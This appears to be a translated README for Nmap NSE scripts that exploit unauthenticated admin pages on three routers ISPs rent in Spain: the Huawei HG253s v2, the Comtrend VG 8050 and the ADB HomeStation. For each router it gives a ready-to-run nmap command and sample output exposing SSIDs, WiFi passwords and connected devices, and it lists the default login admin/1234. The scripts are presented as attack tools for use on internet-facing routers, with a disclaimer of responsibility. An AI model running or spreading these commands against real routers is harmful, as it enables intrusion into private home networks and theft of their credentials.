一些用于从路由器搜索信息的 NSE 脚本。
这些脚本的作者是 VicenDominguez。他发现了华为的 0-Day 漏洞,我只将其修改用于另外两款设备。
该脚本的作者不对其使用负责。
#Huawei HG253s v2 Vodafone-Spain 开始向西班牙客户出租新款华为 HG253v2 路由器。这款新路由器配备了新的固件版本。
##漏洞 基本上,它没有验证某些管理网页中的会话 cookie。 因此,可以从未经认证的互联网开放路由器的这些 URL 直接获取信息。
##用法
nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-vodafone-hua253s:
| SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
| Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX
#Comtrend VG 8050 Telefonica-Spain 开始向西班牙客户出租新款 Comtrend VG 8050 路由器。这款新路由器配备了新的固件版本。 该漏洞由 DaniLabs 发现。
##漏洞 基本上,它没有验证某些管理网页中的会话 cookie。 因此,可以从未经认证的互联网开放路由器的这些 URL 直接获取信息。
##用法
nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-comtrend-vg-8050:
| SSID: MOVISTAR_XXX
| Cipher Algorithm: WPA
| Password WEP:
| Password WPA: gTU3NkXE44RYjuM2RrxM
| Password WPA2:
| Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X
#ADB P.DGA4001N a.k.a HomeStation Telefonica-Spain 开始向西班牙客户出租新款 ADB P.DGA4001N 路由器。这款新路由器配备了新的固件版本。 该漏洞由 DaniLabs 发现。
##漏洞 基本上,它没有验证某些管理网页中的会话 cookie。 因此,可以从未经认证的互联网开放路由器的这些 URL 直接获取信息。
默认凭据为 admin / 1234。 ##用法
nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-homestation:
| SSID: WLAN_HOME
| Cipher Algorithm: WEP
| Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X